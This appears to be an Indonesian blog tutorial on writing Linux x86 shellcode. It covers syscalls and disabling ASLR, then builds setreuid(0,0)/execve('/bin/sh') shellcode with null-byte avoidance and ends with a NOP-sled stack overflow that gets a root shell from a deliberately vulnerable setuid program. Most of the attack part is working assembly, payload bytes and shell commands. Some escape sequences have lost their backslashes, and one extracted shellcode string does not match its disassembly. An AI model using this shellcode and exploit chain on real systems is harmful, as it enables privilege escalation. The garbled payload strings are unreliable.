Thursday , January 17 2019
Home / White Paper / How to write shellcode

How to write shellcode

Pendahuluan

sebelumnya saya telah menulis artikel tentang buffer overflow, sekarang saatnya saya menulis artikel cara menulis shellcode .
karena dalam pengexploitasian tidak dapat lepas dari shellcode atau payload…
shellcode adalah sekumpulan instruksi lalu di eksekusi lewat program yang akan di exploitasi.
shellcode juga bisa menyebabkan kerusakan yang serius . menghapus semua file, membuat komputer hang, memutuskan koneksi internet , mengambil akses root dll .
itu semua tergantung kebutuhan si pembuat shellcode .

System call ~ syscall

syscall adalah interface diantara protected kernel mode dan user mode .
yang dimaksud protected kernel mode adalah tetap menjaga aplikasi yang dimiliki oleh user (pengguna), tanpa membahayakan sistem operasi .
syscall sangat powerfull dan mengizinkan kita untuk mengakses sistem operasi dengan fungsi tertentu .
seperti : menginput data, mengeluarkan output, keluar dari proses, atau mengeksekusi file binary .
sangat powerfull karena mengizinkan kita langsung mengakses ke kernel .
system call bisa berjalan di linux lewat software interrupt biasa juga disebut “int 0x80” .
dimana “int 0x80” tereksekusi dari program user, CPU akan mengarahkan ke dalam kernel mode dan mengeksekusi fungsi syscall.

linux berbeda dengan unix syscall yang lain , linux menggunakan register untuk performa tertinggi .
karena register berada dalam prosesor bukan dalam memory .
untuk membuat syscall bekerja dengan cara berikut :

1. nomer syscall ditempatkan pada register EAX (al,ah,ax) .
2. argument syscall ditempatkan pada register lain .
3. mengeksekusi int 0x80 (interupsi software)
4. CPU akan mengarahkan ke mode kernel
5. fungsi syscall tereksekusi

[sociallocker]syscall bisa ditemukan di /usr/include/asm/unistd_32.h .

berikut sebagai contoh :

[text][email protected]:~/$ more /usr/include/asm/unistd_32.h[/text] [c]#ifndef _ASM_X86_UNISTD_32_H
#define _ASM_X86_UNISTD_32_H

/*
* This file contains the system call numbers.
*/

#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_open 5
#define __NR_close 6
#define __NR_waitpid 7
#define __NR_creat 8
#define __NR_link 9
#define __NR_unlink 10
#define __NR_execve 11
#define __NR_chdir 12
#define __NR_time 13
#define __NR_mknod 14
#define __NR_chmod 15
#define __NR_lchown 16
#define __NR_break 17
#define __NR_oldstat 18
#define __NR_lseek 19
#define __NR_getpid 20
#define __NR_mount 21
#define __NR_umount 22
#define __NR_setuid 23
#define __NR_getuid 24
#define __NR_stime 25
#define __NR_ptrace 26
#define __NR_alarm 27
#define __NR_oldfstat 28
#define __NR_pause 29
#define __NR_utime 30
#define __NR_stty 31
#define __NR_gtty 32
#define __NR_access 33
#define __NR_nice 34
#define __NR_ftime 35
#define __NR_sync 36
#define __NR_kill 37
–More–(10%)[/c]

Tips :
untuk lebih lengkap penggunaanya anda bisa menggunakan perintah “man 2” yang berisi linux programmer manual mengenai cara penggunaan syscall .

contoh : man 2 execve

secara default memang kebanyakan tidak ada anda bisa mendownloadnya dan menginstallnya dari http://kernel.org
dengan cara berikut .

[text][email protected]:~$ git clone git://git.kernel.org/pub/scm/docs/man-pages/man-pages.git[/text]

atau anda bisa melihat secara online di http://www.kernel.org/doc/man-pages/online/pages/man2/syscalls.2.html
disana kita bisa lihat cara penggunaan syscall pada kernel – kernel terbaru pada saat ini lengkap dengan penjelasannya .

Disable randomize_va_space first !

ini adalah hal terpenting sebelum memulai, kita harus mematikan randomize_va_space terlebih dahulu .
tujuannya adalah untuk menghindari “segmentation fault” pada shellcode yang akan kita eksekusikan .
jika belum dimatikan maka shellcode kita aka mengalami segmentation fault .
sangat perlu saya ingatkan karena kebanyakan orang lupa mematikan randomize_va_space padahal tidak ada yang salah pada shellcode .
shellcode mengalami segmentation fault, lalu bingung “apa yang salah dalam shellcode tesebut ?” padahal hanya lupa mematikan randomisasi address .
berikut cara mematikannya pada kernel 2.6.8 ke atas, harus dengan root asli tidak bisa dengan sudo :

[text][email protected]:/home/gunslinger/# cat /proc/sys/kernel/randomize_va_space
[email protected]:/home/gunslinger/# echo 0 > /proc/sys/kernel/randomize_va_space
[email protected]:/home/gunslinger/# cat /proc/sys/kernel/randomize_va_space[/text]

Penggunaan syscall dalam bahasa C

sebelum kita lanjutkan , kita akan menggunakan syscall dengan bahasa pemrograman tingkat tinggi seperti bahasa C .
sekarang kita membuat contoh program exit dalam bahasa c .

[c]————–exit.c————–
main()
{
exit(0);
}

—————EOF—————-[/c]

save dengan nama exit.c dan compile .
perhatian : compile dengan opsi -static untuk menghindari dinamic linking .

[text][email protected]:~/$ gcc -static -o exit exit.c
exit.c: In function ‘main’:
exit.c:3: warning: incompatible implicit declaration of built-in function ‘exit’[/text]

kemudian kita disassemble binary tersebut .

[text][email protected]:~/$ gdb exit
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"…
(gdb) disas _exit
Dump of assembler code for function _exit:
0x0804e6e0 <_exit+0>: mov 0x4(%esp),%ebx
0x0804e6e4 <_exit+4>: mov $0xfc,%eax
0x0804e6e9 <_exit+9>: int $0x80
0x0804e6eb <_exit+11>: mov $0x1,%eax
0x0804e6f0 <_exit+16>: int $0x80
0x0804e6f2 <_exit+18>: hlt
End of assembler dump.
(gdb)[/text]

disitu terlihat kita menggunakan 2 syscall . dan syscall exit .
perhatikan berikut dibawah ini :

[text]0x0804e6eb <_exit+11>: mov $0x1,%eax
0x0804e6f0 <_exit+16>: int $0x80[/text]

kita mengisi register eax dengan angka 1 .
dan itu syscall exit, lalu kita memanggil software interupt sehingga program kita menjadi exit .

Shellcode dasar

ok, sebelumnya kita telah menggunakan syscall exit lewat bahasa c .
sekarang kita gunakan bahasa assembly .
berikut adalah program tersebut .

[c]—————————-exit.asm—————————-
global _start

_start:

mov eax,1 ; syscall nomer 1 exit
mov ebx,0 ; argumen 0 diletakan di ebx jadi exit(0)
int 0x80

——————————-EOF———————————[/c]

lalu compile program tersebut dan jalankan program tersebut .

[text][email protected]:~/$ nasm -f elf exit.asm
[email protected]:~/$ ld -s -o exit exit.o
[email protected]:~/$ ./exit[/text]

ok sekarang kita siap untuk mengambil opcode dari program tersebut .
kali ini kita menggunakan objdump untuk mengambil opcode dalam program tersebut .

[text][email protected]:~/$ objdump -d exit

exit: file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
8048060: b8 01 00 00 00 mov $0x1,%eax
8048065: bb 00 00 00 00 mov $0x0,%ebx
804806a: cd 80 int $0x80[/text]

terlihat bahwa kode assembly di sebelah kanan dan opcode berada ditengah .
sekarang kita ambil opcode tersebut . dan ubah ke bentuk shellcode .
kita bisa gunakan grep, cut, tr, paste, dan sed untuk mempersingkat waktu pengambilan opcode tersebut .
dengan cara berikut :

[text][email protected]:~/$ objdump -d ./exit|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /x/g’|paste -d ” -s |sed ‘s/^/"/’|sed ‘s/$/"/g’
"xb8x01x00x00x00xbbx00x00x00x00xcdx80"
[/text]

lalu kita test lewat exitshellcode.c

[c]——————————shellcodetest.c———————————-

char shellcode[] = "xb8x01x00x00x00xbbx00x00x00x00xcdx80";

int main(void)
{
(*(void(*)()) shellcode)();
}

————————————EOF—————————————–[/c]

compile program dan eksekusi tersebut .

[text][email protected]:~/$ cat shellcodetest.c
char shellcode[] = "xb8x01x00x00x00xbbx00x00x00x00xcdx80";

int main(void)
{
(*(void(*)()) shellcode)();
}
[email protected]:~/$ gcc -o shellcodetest shellcodetest.c
[email protected]:~/$ ./shellcodetest[/text]

program berjalan dan exit . namun apakah itu exit karena shellcode kita ?
kita bisa gunakan fungsi strlen() pada bahasa C untuk membuktikan apakah shellcode kita yang membuat program tadi menjadi exit .

[c]——————————-shellcodetest.c———————————

#include <stdio.h> // standar input output library

char shellcode[] = "xb8x01x00x00x00xbbx00x00x00x00xcdx80";

int main(void)
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
}

————————————EOF—————————————-[/c]

compile dan run .

[text][email protected]:~/$ gcc -o shellcodetest shellcodetest.c
shellcodetest.c: In function ‘main’:
shellcodetest.c:7: warning: incompatible implicit declaration of built-in function ‘strlen’
[email protected]:~/$ ./shellcodetest
Length: 2
[/text]

ternyata yang membuat program kita menjadi exit bukan karena shellcode kita .
perhatikan berikut :
-> Length: 2
sebenarnya shellcode kita memiliki, panjang 12 byte .
tetapi karena adanya string “x00” string kita menjadi terputus .
itu disebut nullbyte atau terminate string, nullbyte dalam bahasa c bisa memutuskan string yang sesudahnya .
seperti halnya teknik hacking menggunakan lfi (local file inclusion) jika anda memberi nullbyte pada suatu variablenya , maka string sesudahnya akan terputus sampai di nullbyte saja .
itu dikarenakan interpreter php menggunakan bahasa c .
selanjutnya kita akan membahas tehnik penghindaran nullbytes .

[h1]Tehnik menghindari “nullbyte”[/h1]

sebelumnya kita telah membuat shellcode exit, akan tetapi kita mendapatkan nullbyte sehingga string kita menjadi terputus .
sehingga shellcode kita tidak bisa bekerja dengan baik .
sekarang kita akan membahas cara menghindari nullbyte .
mari kita balik ke assembly program exit sebelumnya .

[text]—————————-exit.asm——————————-

global _start

_start:

mov eax,1 ; syscall nomer 1 exit
mov ebx,0 ; argumen 0 diletakan di ebx jadi exit(0)
int 0x80

——————————-EOF———————————[/text]

– Gunakan instruksi xor
lalu bagaimana cara menghindarinya ? , pertama kita gunakan instruksi exclusive OR (XOR) pada bahasa assembly .
jika kedua operand tersebut bernilai sama, maka instruksi xor akan menjadikan register tersebut bernilai nol (0).

[text] mov ebx,0 ; register ebx bernilai nol[/text]

ganti dengan

[text]xor ebx,ebx ; register ebx juga bernilai nol[/text]

– Gunakan register yang lebih rendah
kedua, kita tahu bahwa “mov eax,1” juga menghasilkan nullbyte, lalu bagaimana caranya agar tidak ada nullbyte ? .
kita bisa gunakan register yang lebih rendah dari “eax” (32 bit register) menggunakan register yang lebih rendah “al” (low – 8 bit register)
keduanya sama saja, hanya saja eax lebih tinggi karena register “eax” adalah register 32 bit , lalu “al” adalah register 8 bit rendah .

[text]mov eax,1[/text]

ganti dengan

[text]mov al,1[/text]

lalu exit.asm kita akan menjadi seperti berikut :

[text]—————————-exitnew.asm—————————-

global _start

_start:

mov al,1 ; syscall nomer 1 exit
xor ebx,ebx ; argumen 0 diletakan di ebx jadi exit(0)
int 0x80

——————————-EOF———————————[/text]

compile dan linking program tersebut .

[text][email protected]:~/$ nasm -f elf exitnew.asm
[email protected]:~/$ ld -s -o exitnew exitnew.o[/text]

lalu kita gunakan lagi objdump untuk membuktikan apakah shellcode masih mengandung “nullbyte” atau tidak .

[text][email protected]:~/$ objdump -d exitnew

exitnew: file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
8048060: b0 01 mov $0x1,%al
8048062: 31 db xor %ebx,%ebx
8048064: cd 80 int $0x80
[/text]

kita telah sukses menghindari nullbyte .
sebenarnya ada banyak cara menghindari nullbyte .
tetapi jika anda sering melakukan experiment dan shellcode programming, itu adalah hal yang mudah .

Spawning a shell

kebanyakan tujuan pembuat shellcode membuat shellcode adalah untuk menginjeksi file binary bersuid,
dan mendapatkan akses shell “/bin/sh” sesuai dengan id si pemilik file binary bersuid tersebut .
contoh menginjeksi file binary yang vulnerable terhadap serangan buffer overflow, heap overflow, format string, seh dan lain2 .

kali ini kita akan membuat shellcode yang memberikan kita shell .
kita balik lagi ke bahasa pemrograman lebih tinggi, dalam bahasa c cara membuat akses shell dengan setreuid 0,0 lewat syscall dengan cara berikut .

[c]—————————-shell.c—————————-

#include <unistd.h> // include dengan daftar syscall

main()
{
setreuid(0,0); // syscall nomer 70 dengan argumen 0,0
execve("/bin/sh",NULL,NULL); // syscall nomer 11 dengan argumen "/bin/sh",null,null
return (0);
}

——————————EOF——————————[/c]

compile program tersebut lalu tes dengan suid root .
lalu eksekusi file binary tersebut .

[text][email protected]:~/$ gcc -o shell shell.c
[email protected]:~/$ sudo chown root:root shell
[sudo] password for gunslinger:
[email protected]:~/$ sudo chmod 4755 shell
[email protected]:~/$ ./shell
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# exit[/text]

shell tersebut memberikan akses root karena sebelumnya kita telah mendrop akses root ke dalam file tersebut dengan setreuid 0,0 .
metode dalam penginjeksian shellcode fungsi setreuid adalah mendrop akses userid si user file binary tersebut .
maka fungsi syscall setreuid adalah hal yang juga sangat penting dalam shellcode .
ok, sekarang saatnya kita membuat shellcode yang memberikan kita akses “/bin/sh” dengan setreuid juga .
sekarang kita harus membuatnya dari bahasa tingkat rendah yaitu assembly .
pertama kita bisa gunakan python, untuk mengconversi string “/bin/sh” ke bentuk hexadesimal.
lalu kita ubah ke bentuk little endian karena kita tahu bahwa struktur stack adalah lifo (last in first out) .

[text][email protected]:~/$ python
Python 2.6.2 (release26-maint, Apr 19 2009, 01:56:41)
[GCC 4.3.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import binascii
>>> print "hs//".encode("hex")
68732f2f
>>> print "nib/".encode("hex")
6e69622f
>>> quit()[/text]

kita telah mendapatkan string “/bin/sh” dalam hexadesimal dan dalam bentuk little endian .

68732f2f
6e69622f

kita tambahkan “0x” agar assembly mengerti itu adalah bilangan hexadesimal .

0x68732f2f
0x6e69622f

kita telah mendapatkan string “/bin/sh” dalam intel assembly .
saatnya ke program utama .

[text]—————————-shell.asm—————————-

global _start

_start:

xor eax,eax ; pertama kita membersihkan register terlebih dahulu
xor ebx,ebx
xor ecx,ecx
xor edx,edx

;setreuid (0,0)
mov al,70 ; syscall nomer 70 ~ setreuid
xor ebx,ebx ; argumen pertama diletakan pada register ebx, instruksi xor pada kedua operand yang sama, maka menghasilkan nol (NULL) ~ seteruid(0,
xor ecx,ecx ; argumen kedua diletakan pada register ecx, instruksi xor pada kedua operand yang sama, maka menghasilkan nol (NULL) ~ setreuid(0,0)
int 0x80 ; panggil interupsi software, kerjakan !

; execve ("/bin//sh",NULL,NULL)
mov al,11 ; syscall nomer 11 ~ execve
push ebx ; dorong register ebx kedalam stack ~ execve(
push 0x68732f2f ; dorong string "sh//" kedalam stack
push 0x6e69622f ; dorong string "nib/" kedalam stack
mov ebx,esp ; copykan isi stack pointer ke register ebx, sekarang isi register ebx adalah "/bin//sh" ~ execve("/bin//sh",
xor ecx,ecx ; argumen kedua diletakan pada register ecx, instruksi xor pada kedua operand yang sama, maka menghasilkan nol (NULL) ~ execve("/bin//sh",NULL,
xor ecx,ecx ; argumen kedua diletakan pada register edx, instruksi xor pada kedua operand yang sama, maka menghasilkan nol (NULL) ~ execve("/bin//sh",NULL,NULL)
push ebx ; dorong register ebx kedalam stack ~ execve("/bin//sh",NULL,NULL)
int 0x80 ; panggil interupsi software, kerjakan !

——————————–EOF———————————-[/text]

compile dan linking program tersebut dengan root.
setelah itu beri suid root ke program tersebut lalu jalankan dengan user biasa .

[text][email protected]:/home/gunslinger/# nasm -f elf shell.asm
[email protected]:/home/gunslinger/# ld -s -o shell shell.o
[email protected]:/home/gunslinger/# chown root:root shell
[email protected]:/home/gunslinger/# chmod 4755 shell
[email protected]:/home/gunslinger/# exit
[email protected]:~/$ ./shell
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# exit[/text]

program berjalan dengan baik, sekarang saatnya kita mengambil opcode file binary tersebut dengan objdump .

[text][email protected]:~/$ objdump -d shell

shell: file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 31 c9 xor %ecx,%ecx
8048066: 31 d2 xor %edx,%edx
8048068: b0 46 mov $0x46,%al
804806a: 31 db xor %ebx,%ebx
804806c: 31 c9 xor %ecx,%ecx
804806e: cd 80 int $0x80
8048070: b0 0b mov $0xb,%al
8048072: 53 push %ebx
8048073: 68 2f 2f 73 68 push $0x68732f2f
8048078: 68 2f 62 69 6e push $0x6e69622f
804807d: 89 e3 mov %esp,%ebx
804807f: 31 c9 xor %ecx,%ecx
8048081: 31 c9 xor %ecx,%ecx
8048083: 53 push %ebx
8048084: cd 80 int $0x80
[email protected]:~/$ objdump -d ./shell|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /x/g’|paste -d ” -s |sed ‘s/^/"/’|sed ‘s/$/"/g’
"x31xc0x31xdbx31xc9x31xd2xb0x46x31xdbx31xc9xcdx80xb0x0bx68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x31xc9xcdx80x31xc0xb0x0bx31xdbxcdx80"[/text]

test run dengan shellcodetest.c

[c]——————————-shellcodetest.c———————————

char shellcode[] = "x31xc0x31xdbx31xc9x31xd2xb0x46x31xdbx31"
"xc9xcdx80xb0x0bx53x68x2fx2fx73x68x68x2f"
"x62x69x6ex89xe3x31xc9x31xc9x53xcdx80";

int main(void)
{
(*(void(*)()) shellcode)();
}

————————————EOF—————————————-[/c]

compile tersebut dengan root.
setelah itu beri suid root ke program tersebut lalu jalankan dengan user biasa .

[text][email protected]:/home/gunslinger/# vim shellcodetest.c
[email protected]:/home/gunslinger/# cat shellcodetest.c
char shellcode[] = "x31xc0x31xdbx31xc9x31xd2xb0x46x31xdbx31"
"xc9xcdx80xb0x0bx53x68x2fx2fx73x68x68x2f"
"x62x69x6ex89xe3x31xc9x31xc9x53xcdx80";

int main(void)
{
(*(void(*)()) shellcode)();
}
[email protected]:/home/gunslinger/# gcc -o shellcodetest shellcodetest.c
[email protected]:/home/gunslinger/# chown root:root shellcodetest.c
[email protected]:/home/gunslinger/# chmod 4755 shellcodetest
[email protected]:/home/gunslinger/# exit
[email protected]:~/$ ./shellcodetest
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# echo GAME is NOT OVER YET
GAME is NOT OVER YET
# exit
[email protected]:~/$[/text]

kita telah sukses membuat shellcode shell menggunakan setreuid(0,0) .
tetapi permainan belum berakhir sampai disini .

[h1]Load your shellcode right now ![/h1]

ok, kita sudah berada di puncak akhir game pada tutorial edisi pertama .
sekarang saatnya kita injeksi shellcode kita kedalam aplikasi yang rentan pada serangan buffer overflow .
saya sudah membahas tehnik exploitasi buffer overflow sebelumnya dan kita akan pakai aplikasi bof2.c .
tersedia pada link berikut : http://www.exploit-db.com/papers/14108/

let’s start our game…

[text][email protected]:~/$ vim bof2.c
[email protected]:~/$ cat bof2.c
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
char buffer[10];
strcpy(buffer, argv[1]);

return 0;
}
[email protected]:~/$ vim getenv.c
[email protected]:~/$ cat getenv.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char** argv)
{
printf("%s terletak pada address %pn", argv[1], getenv(argv[1]));
return (0);
}
[email protected]:~/$ gcc -o bof2 -g -fno-stack-protector -mpreferred-stack-boundary=2 bof2.c
[email protected]:~/$ sudo chown root:root bof2
[sudo] password for gunslinger:
[email protected]:~/$ sudo chmod 4755 bof2
[email protected]:~/$ gcc -o getenv getenv.c
[email protected]:~/$ objdump -d ./shell|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /x/g’|paste -d ” -s |sed ‘s/^/"/’|sed ‘s/$/"/g’
"x31xc0x31xdbx31xc9x31xd2xb0x46x31xdbx31xc9xcdx80xb0x0bx53x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x31xc9x53xcdx80"
[email protected]:~/$ echo -ne "x31xc0x31xdbx31xc9x31xd2xb0x46x31xdbx31xc9xcdx80xb0x0bx53x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x31xc9x53xcdx80" > shellcode.bin
[email protected]:~/$ cat shellcode.bin
1�1�1�1ҰF1�1�̀�
Sh//shh/bin��1�1�S̀[email protected]:~/$
[email protected]:~/$ export PAYLOAD=$(perl -e ‘print "x90" x 200’)$(cat shellcode.bin)
guns[email protected]:~/$ echo $PAYLOAD
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1�1�1ҰF1�1�̀�
Sh//shh/bin��1�1�S̀
[email protected]:~/$ ./getenv PAYLOAD
PAYLOAD terletak pada address 0xbffffe89
[email protected]:~/$ printf "%xn" $((0xbffffe89 + 100))
bffffeed
[email protected]:~/$ echo "converted in little endian shellcode : xedxfexffxbf"
converted in little endian shellcode : xedxfexffxbf
[email protected]:~/$ ./bof2 $(perl -e ‘print "xedxfexffxbf" x 10’)
Segmentation fault
[email protected]:~/$ ./bof2 $(perl -e ‘print "x90" x 2 . "xedxfexffxbf" x 10’)
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAMEOVER…
GAMEOVER…
# exit
[/text][/sociallocker]

GAMEOVER…

Original Post by cr0security [email protected]